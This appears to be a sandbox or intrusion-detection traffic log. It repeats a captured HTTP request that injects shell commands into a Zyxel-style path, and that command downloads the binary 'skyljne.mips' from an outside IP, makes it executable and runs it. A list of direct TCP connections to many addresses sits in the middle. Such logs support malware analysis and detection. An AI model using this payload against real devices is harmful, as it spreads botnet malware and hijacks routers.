            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 197.21.115.18
            Source: unknownTCP traffic detected without corresponding DNS query: 197.70.50.228
            Source: unknownTCP traffic detected without corresponding DNS query: 197.8.40.111
            Source: unknownTCP traffic detected without corresponding DNS query: 157.148.191.146
            Source: unknownTCP traffic detected without corresponding DNS query: 41.115.156.42
            Source: unknownTCP traffic detected without corresponding DNS query: 41.46.136.200
            Source: unknownTCP traffic detected without corresponding DNS query: 197.79.212.254
            Source: unknownTCP traffic detected without corresponding DNS query: 157.19.32.94
            Source: unknownTCP traffic detected without corresponding DNS query: 157.68.76.162
            Source: unknownTCP traffic detected without corresponding DNS query: 41.196.228.189
            Source: unknownTCP traffic detected without corresponding DNS query: 157.86.203.130
            Source: unknownTCP traffic detected without corresponding DNS query: 157.73.106.76
            Source: unknownTCP traffic detected without corresponding DNS query: 41.16.128.120
            Source: unknownTCP traffic detected without corresponding DNS query: 27.73.192.32
            Source: unknownTCP traffic detected without corresponding DNS query: 157.155.30.204
            Source: unknownTCP traffic detected without corresponding DNS query: 157.45.171.157
            Source: unknownTCP traffic detected without corresponding DNS query: 109.48.104.181
            Source: unknownTCP traffic detected without corresponding DNS query: 107.149.72.203
            Source: unknownTCP traffic detected without corresponding DNS query: 88.119.40.12
            Source: unknownTCP traffic detected without corresponding DNS query: 41.200.44.105
            Source: unknownTCP traffic detected without corresponding DNS query: 157.165.159.66
            Source: unknownTCP traffic detected without corresponding DNS query: 197.190.72.17
            Source: unknownTCP traffic detected without corresponding DNS query: 157.188.135.189
            Source: unknownTCP traffic detected without corresponding DNS query: 41.234.34.115
            Source: unknownTCP traffic detected without corresponding DNS query: 101.190.236.82
            Source: unknownTCP traffic detected without corresponding DNS query: 197.101.93.203
            Source: unknownTCP traffic detected without corresponding DNS query: 41.188.129.27
            Source: unknownTCP traffic detected without corresponding DNS query: 41.56.211.26
            Source: unknownTCP traffic detected without corresponding DNS query: 197.98.53.41
            Source: unknownTCP traffic detected without corresponding DNS query: 41.236.5.136
            Source: unknownTCP traffic detected without corresponding DNS query: 197.115.253.95
            Source: unknownTCP traffic detected without corresponding DNS query: 197.87.212.242
            Source: unknownTCP traffic detected without corresponding DNS query: 157.31.90.119
            Source: unknownTCP traffic detected without corresponding DNS query: 197.150.130.140
            Source: unknownTCP traffic detected without corresponding DNS query: 197.229.104.82
            Source: unknownTCP traffic detected without corresponding DNS query: 157.229.198.192
            Source: unknownTCP traffic detected without corresponding DNS query: 157.240.83.123
            Source: unknownTCP traffic detected without corresponding DNS query: 38.90.20.231
            Source: unknownTCP traffic detected without corresponding DNS query: 41.192.158.136
            Source: unknownTCP traffic detected without corresponding DNS query: 197.123.197.145
            Source: unknownTCP traffic detected without corresponding DNS query: 197.69.40.37
            Source: unknownTCP traffic detected without corresponding DNS query: 41.12.244.60
            Source: unknownTCP traffic detected without corresponding DNS query: 157.195.21.92
            Source: unknownTCP traffic detected without corresponding DNS query: 157.55.178.26
            Source: unknownTCP traffic detected without corresponding DNS query: 5.212.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 197.237.115.229
            Source: unknownTCP traffic detected without corresponding DNS query: 157.175.111.0
            Source: unknownTCP traffic detected without corresponding DNS query: 34.220.132.75
            Source: unknownTCP traffic detected without corresponding DNS query: 197.70.131.148
            Source: unknownTCP traffic detected without corresponding DNS query: 41.100.175.149
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
